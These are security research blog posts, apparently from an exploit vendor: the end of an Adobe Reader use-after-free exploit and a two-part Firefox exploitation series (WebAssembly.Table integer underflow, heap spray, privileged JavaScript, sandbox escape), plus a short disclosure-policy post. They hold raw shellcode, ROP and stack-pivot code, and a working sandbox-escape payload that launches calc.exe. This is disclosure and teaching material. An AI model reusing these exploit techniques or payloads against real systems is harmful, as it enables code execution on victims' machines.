    shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
    0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
    0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
    0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
    0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
    0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x00000000]

[8]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(dv, SHELLCODE_ADDR+i*4, shellcode[i]);
    }

[9]

    // Overwrite the fake array ArrayObject.type_.classp.enumerate pointer to achieve EIP control
    writeUint32(dv, FAKE_ARRAY_JSOBJ_ADDR+0x40+0x10+0x1c, stackPivot);
}

In the code listing above, at [1], [2], [3], and [4] the base addresses of the EScript.api, AcroForm.api, icucnv58.dll, and Kernel32.dll modules are obtained. At [5] the address to the stack pivot gadget is calculated. The function pointer selected to hijack the execution flow does not allow controlling any other CPU register, so the stack pivot gadget selected (mov esp, 0x59000008; ret) relocates the stack to 0x59000008, where the address of the VirtualProtect function [6] and the parameters passed to it are written [7]. Finally, the shellcode is written [8] and the fake Array object internal pointer ArrayObject.type_.classp.enumerate is overwritten with the address of the stack pivot gadget [9].
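
The words written at the pivoted stack address can be summarized as a small table. The sketch below assumes the 32-bit stdcall convention and the documented VirtualProtect parameter order (lpAddress, dwSize, flNewProtect, lpflOldProtect). The buildVirtualProtectFrame helper and the sample addresses are hypothetical.

```javascript
var PAGE_EXECUTE_READWRITE = 0x40;

// Returns the consecutive 32-bit words expected at the pivoted stack pointer.
function buildVirtualProtectFrame(virtualProtectAddr, shellcodeAddr, shellcodeSize, oldProtectPtr) {
    return [
        virtualProtectAddr,      // popped by the ret of the stack pivot gadget
        shellcodeAddr,           // return address taken when VirtualProtect returns
        shellcodeAddr,           // lpAddress
        shellcodeSize,           // dwSize
        PAGE_EXECUTE_READWRITE,  // flNewProtect
        oldProtectPtr            // lpflOldProtect, must point to writable memory
    ];
}

// Sample values for illustration only.
var frame = buildVirtualProtectFrame(0x76a20420, 0x5a000000, 0x1000, 0x40000100);
```

Each entry corresponds to one of the writeUint32 calls at [6] and [7], at offsets 0, 4, 8, 12, 16, and 20 from 0x59000008.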

The last step is to trigger the execution of the ROP chain by assigning a value to a nonexistent property of the fake Array object. This calls the internal enumerate function, as it is expected to define all the lazy properties not yet reflected in the object. This can be done with the following line of code:

fakeArrObj.triggerRopchain = 2;

Conclusion

Adobe patched this vulnerability in August 2020. However, it is likely that more vulnerabilities of this nature will continue to pop up in Adobe Reader given its large attack surface. We hope you enjoyed reading our analysis and learned something new. Be sure to check out our other blog posts such as Firefox vulnerability research and patch-gapping Chrome.

The post Analysis of a use-after-free Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

2021 Disclosure Policy

17 March 2021 at 16:16

It’s been a half-decade since we last updated our disclosure policy and it’s time for us to iterate on our policy again. As we detailed in our previous post, while there is inherent value to our subscription customers to maximize our 0-day shelf life… empirically, we can state that such vulnerabilities can go unpatched for inordinately long times and it is in the best interest of the community at large to keep vendors informed. As of the time of this writing, we have adopted the following simple disclosure policy.

  1. Vulnerability information will be reported to the affected vendor six months after release to our subscribers.
  2. Six months after this disclosure, or once the vendor has released a patch, whichever happens first, we reserve the right to publish details about the vulnerability.

This policy applies to both internally generated research as well as any research acquired through our Research Sponsorship Program (RSP), an effort we maintain to crowdsource both 0-day and n-day research from individual contributors around the globe.

If you’re interested in learning more about our subscriptions, we welcome you to reach out to us at [email protected].

The post 2021 Disclosure Policy appeared first on Exodus Intelligence.

Firefox Vulnerability Research Part 2

10 November 2020 at 17:59

By Arthur Gerkis and David Barksdale

This series of posts makes public some old Firefox research which our Zero-Day customers had access to before it was known publicly, and then our N-Day customers after it was patched. We’ve also used this research to teach browser exploitation in our Vuln-Dev Master Class.

In the previous post we analyzed an integer underflow in part of Firefox’s WebAssembly code and used it to read and write memory in the sandboxed content process. In this post we will use this to execute arbitrary code in the content process, and finally escape the sandbox to the broker process and execute calc.exe.

Executing Privileged JavaScript

Here we will discuss a technique for executing privileged JavaScript by making use of the ability to read and write memory. An overview of the script security architecture of Firefox can be found here. There is a JavaScript object specific only to Firefox-based browsers called Components. Normal content pages run with the content principal and have a limited version of this object. Pages with the system principal have full access to the object and can use it to access native XPCOM objects. The goal is to gain access to a privileged Components object using the following steps:

  1. find and leak the address of the system principal;
  2. find and override the actual document compartment principal with the system principal; this gives the ability to access properties of privileged objects;
  3. find and override an iframe principal with the system principal; this allows us to load privileged pages into an actual iframe;
  4. load a privileged page into an iframe and access its Components.

Finding the System Principal

We first find the base address of xul.dll using the address of a TypedArray object we discovered previously. At offset 0xC into this object is a pointer into the xul.dll module. All modules are loaded on a 0x10000-byte boundary and begin with the DOS header signature ‘MZ’ as the first 16-bit word. Starting from our pointer into xul.dll, we round down to that boundary and search backwards in memory, one boundary at a time, until we find the signature.
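The backward scan can be sketched as follows. This is a minimal illustration rather than the exploit's actual code: read16 stands in for whatever memory-read primitive is available, and the fake memory exists only to make the example self-contained. The base value 0x53440000 is derived from the debugger output in this post (0x55265620 - 0x1e25620).

```javascript
// Hypothetical sketch: locate a module base by scanning backwards for 'MZ'.
const MODULE_ALIGNMENT = 0x10000; // modules are loaded on 0x10000-byte boundaries
const MZ_SIGNATURE = 0x5a4d;      // bytes 'M' (0x4d), 'Z' (0x5a) read as a little-endian 16-bit word

// read16(address) is an assumed primitive returning the 16-bit word at address.
function findModuleBase(pointerIntoModule, read16) {
  // Round the leaked pointer down to the nearest alignment boundary.
  let candidate = pointerIntoModule - (pointerIntoModule % MODULE_ALIGNMENT);
  while (candidate > 0) {
    if (read16(candidate) === MZ_SIGNATURE) {
      return candidate;
    }
    candidate -= MODULE_ALIGNMENT;
  }
  return null; // no signature found
}

// Stand-in for real memory: only the module base holds the signature.
const fakeBase = 0x53440000;
const fakeRead16 = (address) => (address === fakeBase ? MZ_SIGNATURE : 0);

const leakedPointer = fakeBase + 0x1e25620; // a pointer somewhere inside the module
const moduleBase = findModuleBase(leakedPointer, fakeRead16);
console.log(moduleBase.toString(16));
```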

Once we’ve found xul.dll in memory we can parse its export table to look for various symbols within the module. The first symbol we look for is nsLayoutModule_NSModule. This structure contains a useful pointer and is shown below.

0:033> ln xul + 0x1e25620
(55265620)   xul!nsLayoutModule_NSModule   |  (55265624)   xul!docshell_provider_NSModule
Exact matches:
    xul!nsLayoutModule_NSModule = 0x557f3b58

0:033> dt xul!nsLayoutModule_NSModule
0x557f3b58 
   +0x000 mVersion         : 0x34
   +0x004 mCIDs            : 0x557f3270 mozilla::Module::CIDEntry
   +0x008 mContractIDs     : 0x557f2650 mozilla::Module::ContractIDEntry
   +0x00c mCategoryEntries : 0x557f3008 mozilla::Module::CategoryEntry
   +0x010 getFactoryProc   : (null) 
   +0x014 loadProc         : 0x539ef4f9     nsresult  xul!Initialize+0
   +0x018 unloadProc       : 0x5358734f     void  xul!LayoutModuleDtor+0
   +0x01c selector         : 4 ( ALLOW_IN_GPU_PROCESS )

We follow the loadProc pointer to the function Initialize, which is shown below.

xul!Initialize [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\layout\build\nslayoutmodule.cpp @ 353]:
539ef4f9 803d94179d5500  cmp     byte ptr [xul!gInitialized (559d1794)],0
539ef500 0f85bdc73500    jne     xul!Initialize+0x35c7ca (53d4bcc3)
539ef506 833dc01e9f5505  cmp     dword ptr [xul!mozilla::startup::sChildProcessType (559f1ec0)],5
539ef50d 7420            je      xul!Initialize+0x36 (539ef52f)
539ef50f 56              push    esi
539ef510 c60594179d5501  mov     byte ptr [xul!gInitialized (559d1794)],1
539ef517 e80613f6ff      call    xul!nsXPConnect::InitStatics (53950822)
539ef51c e811000000      call    xul!nsLayoutStatics::Initialize (539ef532)

We disassemble this function and follow the call to nsXPConnect::InitStatics, which is shown below.

xul!operator new [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\xpconnect\src\nsxpconnect.cpp @ 109] 
[inlined in xul!nsXPConnect::InitStatics [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\js\xpconnect\src\nsxpconnect.cpp @ 109]]:
53950822 6a10            push    10h
53950824 ff15cc432655    call    dword ptr [xul!_imp__moz_xmalloc (552643cc)]
5395082a 59              pop     ecx
5395082b 85c0            test    eax,eax
5395082d 0f84d8b43c00    je      xul!nsXPConnect::InitStatics+0x3cb4e9 (53d1bd0b)
53950833 8bc8            mov     ecx,eax
53950835 e824180000      call    xul!nsXPConnect::nsXPConnect (5395205e)
5395083a 83780800        cmp     dword ptr [eax+8],0
5395083e 56              push    esi
5395083f a33cd79c55      mov     dword ptr [xul!nsXPConnect::gSelf (559cd73c)],eax
53950844 be18dd4055      mov     esi,offset xul!`string' (5540dd18)
53950849 0f84c3b43c00    je      xul!nsXPConnect::InitStatics+0x3cb4f0 (53d1bd12)
5395084f 50              push    eax
53950850 e87531b5ff      call    xul!mozilla::widget::myDownloadObserver::AddRef (534a39ca)
53950855 e8b26af0ff      call    xul!nsScriptSecurityManager::InitStatics (5385730c)
5395085a a1645c9d55      mov     eax,dword ptr [xul!gScriptSecMan (559d5c64)]
5395085f 6810d79c55      push    offset xul!nsXPConnect::gSystemPrincipal (559cd710)
53950864 50              push    eax
53950865 a340d79c55      mov     dword ptr [xul!nsXPConnect::gScriptSecurityManager (559cd740)],eax
5395086a 8b08            mov     ecx,dword ptr [eax]
5395086c ff5124          call    dword ptr [ecx+24h]
5395086f 833d10d79c5500  cmp     dword ptr [xul!nsXPConnect::gSystemPrincipal (559cd710)],0

We disassemble this function and find the address of nsXPConnect::gSystemPrincipal, the keys to Dad’s car.

Finding and Overriding the Document Compartment Principal

The compartment principal we want to override can be found using an iframe we previously sprayed onto the heap. To find the location of the principal we start with the JSObject containing the iframe and follow the path of pointers until we find the relevant JSCompartment object, as shown below.

0:033> ddp 067bbc40 L14/4
067bbc40  0df34a48 5596b084 xul!mozilla::dom::HTMLIFrameElementBinding::sClass
067bbc44  0df48bf8 0df352c8
067bbc48  00000000
067bbc4c  552701c8 55529c74 xul!js_Object_str
067bbc50  0dde6780 5535b7b0 xul!mozilla::dom::HTMLIFrameElement::`vftable'

0:033> dt 0dde6780 xul!mozilla::dom::HTMLIFrameElement
   +0x000 __VFN_table : 0x5535b7b0 
   +0x004 __VFN_table : 0x55271f84 
   +0x008 mWrapper         : 0x067bbc40 JSObject
   +0x00c mFlags           : 0x100004
   +0x010 mNodeInfo        : RefPtr<mozilla::dom::NodeInfo>
   +0x014 mParent          : 0x11872ce0 nsINode
   +0x018 mBoolFlags       : 0x2000e
[skip]

0:033> dd 0x067bbc40 L1
067bbc40  0df34a48

0:033> dt 0df34a48 js::ObjectGroup
xul!js::ObjectGroup
   +0x000 clasp_           : 0x5596b084 js::Class
   +0x004 proto_           : js::GCPtr<js::TaggedProto>
   +0x008 compartment_     : 0x1183ac00 JSCompartment
   +0x00c flags_           : 0
   +0x010 addendum_        : (null) 
   +0x014 propertySet      : (null) 

0:033> dt 0x1183ac00 JSCompartment
xul!JSCompartment
   +0x000 creationOptions_ : JS::CompartmentCreationOptions
   +0x014 behaviors_       : JS::CompartmentBehaviors
   +0x024 zone_            : 0x06b46800 JS::Zone
   +0x028 runtime_         : 0x04b86108 JSRuntime
   +0x02c principals_      : 0x04b8e444 JSPrincipals
   +0x030 isSystem_        : 0
[skip]

We write the value of the previously found system principal to offset 0x2C into this JSCompartment object.
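The pointer walk above can be sketched as below. The offsets are the ones visible in the debugger output; read32 and write32 are assumed primitives built on the memory read/write capability, the Map merely simulates memory, and the system principal value is a placeholder that does not come from the post.

```javascript
// Offsets taken from the debugger output above (32-bit build).
const OFFSET_GROUP = 0x00;       // first word of the JSObject: js::ObjectGroup*
const OFFSET_COMPARTMENT = 0x08; // js::ObjectGroup::compartment_
const OFFSET_PRINCIPALS = 0x2c;  // JSCompartment::principals_

// read32/write32 are assumed primitives, not functions from the original exploit.
function overrideCompartmentPrincipal(iframeObject, systemPrincipal, read32, write32) {
  const group = read32(iframeObject + OFFSET_GROUP);
  const compartment = read32(group + OFFSET_COMPARTMENT);
  write32(compartment + OFFSET_PRINCIPALS, systemPrincipal);
  return compartment;
}

// Simulated memory populated with the values from the dumps above.
const compartmentMemory = new Map([
  [0x067bbc40, 0x0df34a48], // JSObject -> ObjectGroup
  [0x0df34a50, 0x1183ac00], // ObjectGroup::compartment_
  [0x1183ac2c, 0x04b8e444], // JSCompartment::principals_ (content principal)
]);
const readCompartment32 = (address) => compartmentMemory.get(address);
const writeCompartment32 = (address, value) => compartmentMemory.set(address, value);

const placeholderSystemPrincipal = 0x12345678; // placeholder, not a value from the post
const patchedCompartment = overrideCompartmentPrincipal(
  0x067bbc40, placeholderSystemPrincipal, readCompartment32, writeCompartment32);
```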

Finding and Overriding the mOwnerManager Principal

Loading a privileged page into our iframe requires overriding the mOwnerManager principal of the iframe. This is found via a similar path of pointers starting from the HTMLIFrameElement object found above.

0:033> dt 0dde6780 xul!mozilla::dom::HTMLIFrameElement
   +0x000 __VFN_table : 0x5535b7b0 
   +0x004 __VFN_table : 0x55271f84 
   +0x008 mWrapper         : 0x067bbc40 JSObject
   +0x00c mFlags           : 0x100004
   +0x010 mNodeInfo        : RefPtr<mozilla::dom::NodeInfo>
   +0x014 mParent          : 0x11872ce0 nsINode
   +0x018 mBoolFlags       : 0x2000e
[skip]

0:033> dd 0dde6780 
0dde6780  5535b7b0 55271f84 067bbc40 00100004
0dde6790  118c5100 11872ce0 0002000e 00000000
0dde67a0  06cd59c0 00000000 118fc800 0cb0f940
0dde67b0  00000014 04bd2f00 00020000 00000400
0dde67c0  5535b5bc e5e5e5e5 5535b59c 5535b590
0dde67d0  00000000 559e3364 5535b558 0cb0f820
0dde67e0  00000000 00000000 e5e5e500 e5e5e5e5
0dde67f0  5535b4e8 e5e5e5e5 e5e5e5e5 e5e5e5e5

0:033> dt 0x118c5100 mozilla::dom::NodeInfo
xul!mozilla::dom::NodeInfo
   +0x000 mRefCnt          : nsCycleCollectingAutoRefCnt
   =5597ee68 _cycleCollectorGlobal : mozilla::dom::NodeInfo::cycleCollection
   +0x004 mDocument        : 0x1154a800 nsIDocument
   +0x008 mInner           : mozilla::dom::NodeInfo::NodeInfoInner
   +0x020 mOwnerManager    : RefPtr<nsNodeInfoManager>
   +0x024 mQualifiedName   : nsString
   +0x030 mNodeName        : nsString
   +0x03c mLocalName       : nsString

0:033> dd 0x118c5100 
118c5100  00000004 1154a800 062c6160 00000000
118c5110  00000003 e5e50001 00000000 00000000
118c5120  06cc0130 5599a914 00000006 00000005
118c5130  118c6088 00000006 00000005 5599a914
118c5140  00000006 00000005 e5e5e5e5 e5e5e5e5
118c5150  0dc91550 00000000 00000000 00000000
118c5160  00000000 00000000 00000000 00000000
118c5170  00000000 00000000 00000000 00000000

0:033> dt 06cc0130 nsNodeInfoManager
xul!nsNodeInfoManager
   =5597efc0 _cycleCollectorGlobal : nsNodeInfoManager::cycleCollection
   +0x000 mRefCnt          : nsCycleCollectingAutoRefCnt
   +0x004 mNodeInfoHash    : 0x0db8d780 PLHashTable
   +0x008 mDocument        : 0x1154a800 nsIDocument
   +0x00c mNonDocumentNodeInfos : 0x12
   +0x010 mPrincipal       : nsCOMPtr<nsIPrincipal>
   +0x014 mDefaultPrincipal : nsCOMPtr<nsIPrincipal>
   +0x018 mTextNodeInfo    : 0x11872ab0 mozilla::dom::NodeInfo
   +0x01c mCommentNodeInfo : (null) 
   +0x020 mDocumentNodeInfo : 0x11872600 mozilla::dom::NodeInfo
   +0x024 mBindingManager  : RefPtr<nsBindingManager>
[skip]

We then write the value of the previously found system principal to offset 0x10 into this nsNodeInfoManager object.
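As a rough sketch, the same walk can be expressed as a table of field offsets that is followed one dereference at a time. The offsets and addresses come from the dumps above; followPointers, the read/write helpers, and the principal value are illustrative assumptions.

```javascript
// Each entry is the offset of a pointer field to dereference (from the dumps above).
const PATH_TO_NODE_INFO_MANAGER = [
  0x10, // HTMLIFrameElement::mNodeInfo
  0x20, // NodeInfo::mOwnerManager
];
const OFFSET_MANAGER_PRINCIPAL = 0x10; // nsNodeInfoManager::mPrincipal

// Hypothetical helper: dereference each offset in turn, starting at `start`.
function followPointers(start, offsets, read32) {
  return offsets.reduce((address, offset) => read32(address + offset), start);
}

function overrideOwnerManagerPrincipal(iframeElement, systemPrincipal, read32, write32) {
  const manager = followPointers(iframeElement, PATH_TO_NODE_INFO_MANAGER, read32);
  write32(manager + OFFSET_MANAGER_PRINCIPAL, systemPrincipal);
  return manager;
}

// Simulated memory holding only the fields that the walk touches.
const nodeInfoMemory = new Map([
  [0x0dde6790, 0x118c5100], // HTMLIFrameElement::mNodeInfo
  [0x118c5120, 0x06cc0130], // NodeInfo::mOwnerManager
  [0x06cc0140, 0x00000000], // nsNodeInfoManager::mPrincipal (value not shown in the post)
]);
const readNodeInfo32 = (address) => nodeInfoMemory.get(address);
const writeNodeInfo32 = (address, value) => nodeInfoMemory.set(address, value);

const examplePrincipal = 0x12345678; // placeholder, not a value from the post
const managerAddress = overrideOwnerManagerPrincipal(
  0x0dde6780, examplePrincipal, readNodeInfo32, writeNodeInfo32);
```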

Accessing Privileged JavaScript

Now we can load the privileged page about:newtab into our iframe and access the Components object with the JavaScript below.

iframe.src = 'about:newtab';
iframe.onload = function() {
    privilegedWindow = iframe.contentWindow;
    // Components object accessible via privilegedWindow.Components
};

Escaping the Content Process Sandbox

Here we describe a technique to execute privileged JavaScript in the broker process via inter-process communication (IPC) from the content process. This technique was patched by a change intended to mitigate prompt spoofing, which introduced a new type of prompt displayed by the broker process.

The content and broker processes communicate with each other via inter-process communication. While this is implemented and used by the C/C++ code, for Firefox there is an additional communication channel which is used by privileged JavaScript. It’s called the Message Manager and is responsible for passing messages between various windows.

The Message Manager was introduced long before the sandbox. Its main goal was to support the legacy methods of interaction between chrome and content during the move from a single-process to a multi-process architecture.

One such interaction is called RemotePrompt, shown below.

var RemotePrompt = {
  init: function() {
    let mm = Cc["@mozilla.org/globalmessagemanager;1"].getService(Ci.nsIMessageListenerManager);
    mm.addMessageListener("Prompt:Open", this);
  },

  receiveMessage: function(message) {
    switch (message.name) {
      case "Prompt:Open":
        if (message.data.uri) {
          this.openModalWindow(message.data, message.target);
        } else {
          this.openTabPrompt(message.data, message.target)
        }
        break;
    }
  },
[skip]
  openModalWindow: function(args, browser) {
    let window = browser.ownerGlobal;
    try {
      PromptUtils.fireDialogEvent(window, "DOMWillOpenModalDialog", browser);
      let bag = PromptUtils.objectToPropBag(args);

      Services.ww.openWindow(window, args.uri, "_blank",
                             "centerscreen,chrome,modal,titlebar", bag);

      PromptUtils.propBagToObject(bag, args);
    } finally {
      PromptUtils.fireDialogEvent(window, "DOMModalDialogClosed", browser);
      browser.messageManager.sendAsyncMessage("Prompt:Close", args);
    }
  }

The function receiveMessage() receives all incoming messages but handles only those named Prompt:Open, and it decides where to pass execution based on the presence of the uri argument. If the argument is present, the function openModalWindow() will execute and create a new window in the broker process with the URI provided in the arguments. The newly created window has the system principal. By passing a data URI as the argument, arbitrary JavaScript code will be loaded and executed in the broker process.

Below is an example of this technique that will launch calc.exe from the broker process.

function executePayload(privilegedWindow) {
  var payload = [];
  // This is the code to execute as privileged JavaScript. In this example,
  // calc.exe is launched at Medium Integrity Level.
  payload.push('var { interfaces: Ci, utils: Cu, classes: Cc } = Components;');
  payload.push('localFile = Cc["@mozilla.org/file/local;1"].createInstance(Ci.nsILocalFile);');
  payload.push('process = Cc["@mozilla.org/process/util;1"].createInstance(Ci.nsIProcess);');
  payload.push('args = [];');
  payload.push('localFile.initWithPath("C:\\\\WINDOWS\\\\system32\\\\calc.exe");');
  payload.push('process.init(localFile);');
  payload.push('process.run(false, args, args.length);');

  // This will get a ContentFrameMessageManager
  var cfmm = privilegedWindow.QueryInterface(Ci.nsIInterfaceRequestor).
    getInterface(Ci.nsIDocShell).
    QueryInterface(Ci.nsIInterfaceRequestor).
    getInterface(Ci.nsIContentFrameMessageManager);
  // This sends a message through the message manager to the broker process
  cfmm.sendAsyncMessage('Prompt:Open', { uri: 'data:text/html,<script>' + payload.join('') + '; close();</script>' });
}

The entire exploit chain is demonstrated in the video below.

Demo popping calc.exe

The post Firefox Vulnerability Research Part 2 appeared first on Exodus Intelligence.

Firefox Vulnerability Research

20 October 2020 at 16:54

By Arthur Gerkis and David Barksdale

This series of posts makes public some old Firefox research which our Zero-Day customers had access to before it was known publicly, and then our N-Day customers after it was patched. We’ve also used this research to teach browser exploitation in our Vuln-Dev Master Class.

In this post we start with an integer underflow in part of Firefox’s WebAssembly code and use it to read and write memory in the sandboxed content process. In later posts we will then use this to execute arbitrary code in the content process, and finally escape the sandbox to the broker process and execute calc.exe.

WebAssembly.Table Integer Underflow (CVE-2018-5093)

This vulnerability was reported to Mozilla by Alex Gaynor as Bug #1415291 and fixed in Firefox 58 and 59.

The vulnerability is triggered using a WebAssembly.Table object which represents an array-like structure that stores function references and provides a bridge between WebAssembly and JavaScript. The following JavaScript code results in a memory read outside the bounds of the table.

// Creates a new WebAssembly Table object.
var wasmTable = new WebAssembly.Table({
  // Provides type of the element.
  element: 'anyfunc',
  // Provides initial size of the table (length of the elements).
  initial: 0
});

// Tries to get the function reference at the index 0x100.
wasmTable.get(0x100);

The JavaScript constructor triggers a call to WasmTableObject::construct() shown below.

/* static */ WasmTableObject*
WasmTableObject::create(JSContext* cx, const Limits& limits)
{
    RootedObject proto(cx, &cx->global()->getPrototype(JSProto_WasmTable).toObject());

    AutoSetNewObjectMetadata metadata(cx);
    RootedWasmTableObject obj(cx, NewObjectWithGivenProto<WasmTableObject>(cx, proto));
    if (!obj)
        return nullptr;

    MOZ_ASSERT(obj->isNewborn());

    TableDesc td(TableKind::AnyFunction, limits);
    td.external = true;

    SharedTable table = Table::create(cx, td, obj);
    if (!table)
        return nullptr;

    obj->initReservedSlot(TABLE_SLOT, PrivateValue(table.forget().take()));

    MOZ_ASSERT(!obj->isNewborn());
    return obj;
}

/* static */ bool
WasmTableObject::construct(JSContext* cx, unsigned argc, Value* vp)
{
    CallArgs args = CallArgsFromVp(argc, vp);

    if (!ThrowIfNotConstructing(cx, args, "Table"))
        return false;

    if (!args.requireAtLeast(cx, "WebAssembly.Table", 1))
        return false;

    if (!args.get(0).isObject()) {
        JS_ReportErrorNumberASCII(cx, GetErrorMessage, nullptr, JSMSG_WASM_BAD_DESC_ARG, "table");
        return false;
    }

...

    RootedWasmTableObject table(cx, WasmTableObject::create(cx, limits));
    if (!table)
        return false;

    args.rval().setObject(*table);
    return true;
}

WasmTableObject::construct() performs different kinds of validations and then calls WasmTableObject::create() which is responsible for the actual table creation.

The TableDesc object holds the properties of the new WebAssembly.Table to be created, including the type of the array (external or internal) and the limits of the table. The call to Table::create() creates a new WebAssembly table object with an initial length of 0 elements.

/* static */ SharedTable
Table::create(JSContext* cx, const TableDesc& desc, HandleWasmTableObject maybeObject)
{
    // The raw element type of a Table depends on whether it is external: an
    // external table can contain functions from multiple instances and thus
    // must store an additional instance pointer in each element.
    UniqueByteArray array;
    if (desc.external)
        array.reset((uint8_t*)cx->pod_calloc<ExternalTableElem>(desc.limits.initial));
    else
        array.reset((uint8_t*)cx->pod_calloc<void*>(desc.limits.initial));
    if (!array)
        return nullptr;

    return SharedTable(cx->new_<Table>(cx, desc, maybeObject, Move(array)));
}

The desc.external variable is set to true because this is an external (user-provided) table creation request; non-external tables are used internally by the JavaScript engine runtime and cannot be controlled directly. The desc.limits.initial variable is 0, so the pod_calloc() function allocates the minimum possible buffer size of 8 bytes. The address of array (array_ in the Table fields) is the base address used when accessing the table array by index.

Integer Underflow

Once the WebAssembly get() function is called, the WasmTableObject::getImpl() method is eventually called.

/* static */ bool
WasmTableObject::getImpl(JSContext* cx, const CallArgs& args)
{
    RootedWasmTableObject tableObj(cx, &args.thisv().toObject().as<WasmTableObject>());
    const Table& table = tableObj->table();

    uint32_t index;
    if (!ToNonWrappingUint32(cx, args.get(0), table.length() - 1, "Table", "get index", &index))
        return false;

    ExternalTableElem& elem = table.externalArray()[index];
    if (!elem.code) {
        args.rval().setNull();
        return true;
    }

    Instance& instance = *elem.tls->instance;
    const CodeRange& codeRange = *instance.code().lookupRange(elem.code);
    MOZ_ASSERT(codeRange.isFunction());

    RootedWasmInstanceObject instanceObj(cx, instance.object());
    RootedFunction fun(cx);
    if (!instanceObj->getExportedFunction(cx, instanceObj, codeRange.funcIndex(), &fun))
        return false;

    args.rval().setObject(*fun);
    return true;
}

The third argument to ToNonWrappingUint32() is the maximum value allowed to be stored in index. When table.length() is 0, the expression table.length() - 1 evaluates to -1; because the argument type is uint32_t, the value wraps around to UINT32_MAX, which defeats the range check entirely. The same bug exists in WasmTableObject::setImpl(), defeating the range check on set().
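The wrap-around is easy to reproduce outside the engine. The sketch below emulates the uint32_t arithmetic with JavaScript's unsigned shift operator. The function names are illustrative, the real body of ToNonWrappingUint32() is not shown in this post, and the "fixed" check is only one possible way to avoid the underflow, not necessarily the patch Mozilla applied.

```javascript
// Emulate the uint32_t result of `table.length() - 1`.
function maxIndexAsUint32(tableLength) {
  // `>>> 0` reinterprets the result as an unsigned 32-bit integer,
  // mirroring the conversion to the uint32_t parameter.
  return (tableLength - 1) >>> 0;
}

// Range check in the spirit of the vulnerable code: index <= length - 1.
function indexPassesVulnerableCheck(index, tableLength) {
  return index <= maxIndexAsUint32(tableLength);
}

// Hypothetical corrected check: compare against the length itself.
function indexPassesFixedCheck(index, tableLength) {
  return index < tableLength;
}

console.log(maxIndexAsUint32(0).toString(16));
console.log(indexPassesVulnerableCheck(0x100, 0));
console.log(indexPassesFixedCheck(0x100, 0));
```

With an empty table the emulated maximum is 0xffffffff, so any 32-bit index passes the vulnerable check, while the length-based comparison rejects it.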

This vulnerability can be used to read or write past the bounds of the array. However, writing out of bounds is limited in how and what it can write. Reading out of bounds cannot be directly used to leak any useful data into JavaScript, but it can be used to create a fake hash table.

Fake Hash Table

To ensure that the required data is located at a fixed address, the heap is sprayed using JavaScript arrays. This data is then used to create a few fake structures. The heap spray causes the following data to be placed at address 0x4d0f0000.

4d0f0000 4d0f0000 4d0f0000 4d0f000c 4d0f0000
4d0f0010 4d0eff9c 4d0f0028 4d0f00b0 4d0f0028
4d0f0020 4d0f0020 00000002 00000000 00000000
4d0f0030 4d0effd4 00000002 4d0f0030 00000000
4d0f0040 00000000 00000000 00000010 00000000
4d0f0050 00000000 00000000 00000000 00000000
4d0f0060 143d6170 ffffff87 00000000 00000000
4d0f0070 00000000 00000000 00000000 00000000
4d0f0080 0000007b 00000030 4d0f0080 cccccccc
4d0f0090 00000000 00000000 14642190 ffffff8c
4d0f00a0 00000000 00000000 13d59320 ffffff8c
4d0f00b0 cccccccc 7e000000 146421ea 00000000
4d0f00c0 00000000 00000000 00000000 00000000
4d0f00d0 00000000 00000000 00000000 00000000
4d0f00e0 00000000 00000000 00000000 00000000
4d0f00f0 00000000 00000000 00000000 00000000
4d0f0100 4d0f0000 4d0f0000 4d0f0000 4d0f0000
4d0f0110 4d0f0000 4d0f0000 4d0f0000 4d0f0000

The first 0x100 bytes contain fake structure fields; the rest is filler that points back to the beginning of the data.

Once the heap spray is done, the vulnerability is triggered by creating a new WebAssembly table and calling the get() function on that table. The following code is then reached.

; File: xul.dll
; Version: 54.0.0.6368

.text:11D4EB33 private: static bool __cdecl js::WasmTableObject::getImpl(struct JSContext *, class JS::CallArgs const &) proc near
...
.text:11D4EB96                 jz      loc_11D4EC40
.text:11D4EB9C                 mov     eax, [ebp+var_4]
.text:11D4EB9F                 mov     ecx, [ebp+var_8]
.text:11D4EBA2                 mov     eax, [eax+30h] ; eax will point to the array_ field
.text:11D4EBA5                 mov     edx, [eax+ecx*8] ; eax+ecx*8 points inside of the heap spray, edx becomes 0x4d0f0000
.text:11D4EBA8                 test    edx, edx        ; if (!elem.code) ... (edx = 0x4d0f0000)
.text:11D4EBAA                 jnz     short loc_11D4EBBF
...
.text:11D4EBBF
.text:11D4EBBF loc_11D4EBBF:
.text:11D4EBBF                 mov     eax, [eax+ecx*8+4] ; reads from the spray and sets eax to 4d0f0000
.text:11D4EBC3                 push    edx
.text:11D4EBC4                 mov     esi, [eax+4]    ; esi will point to the fake js::wasm::Instance object (4d0f0000)
.text:11D4EBC7                 mov     ecx, [esi+8]    ; ecx will point to the fake js::wasm::Code object (4d0f000c)
.text:11D4EBCA                 call    js::wasm::Code::lookupRange(void *)

The array_ field is located at offset 0x30 in the Table object, shown below.

0:000> dt xul!js::wasm::Table
   +0x000 mRefCnt          : Uint4B
   +0x004 maybeObject_     : js::ReadBarriered<js::WasmTableObject *>
   +0x008 observers_       : JS::WeakCache<JS::GCHashSet<js::ReadBarriered<js::WasmInstanceObject *>,js::MovableCellHasher<js::ReadBarriered<js::WasmInstanceObject *> >,js::SystemAllocPolicy> >
   +0x030 array_           : mozilla::UniquePtr<unsigned char [0],JS::FreePolicy>
   +0x034 kind_            : js::wasm::TableKind
   +0x038 length_          : Uint4B
   +0x03c maximum_         : mozilla::Maybe<unsigned int>
   +0x044 external_        : Bool

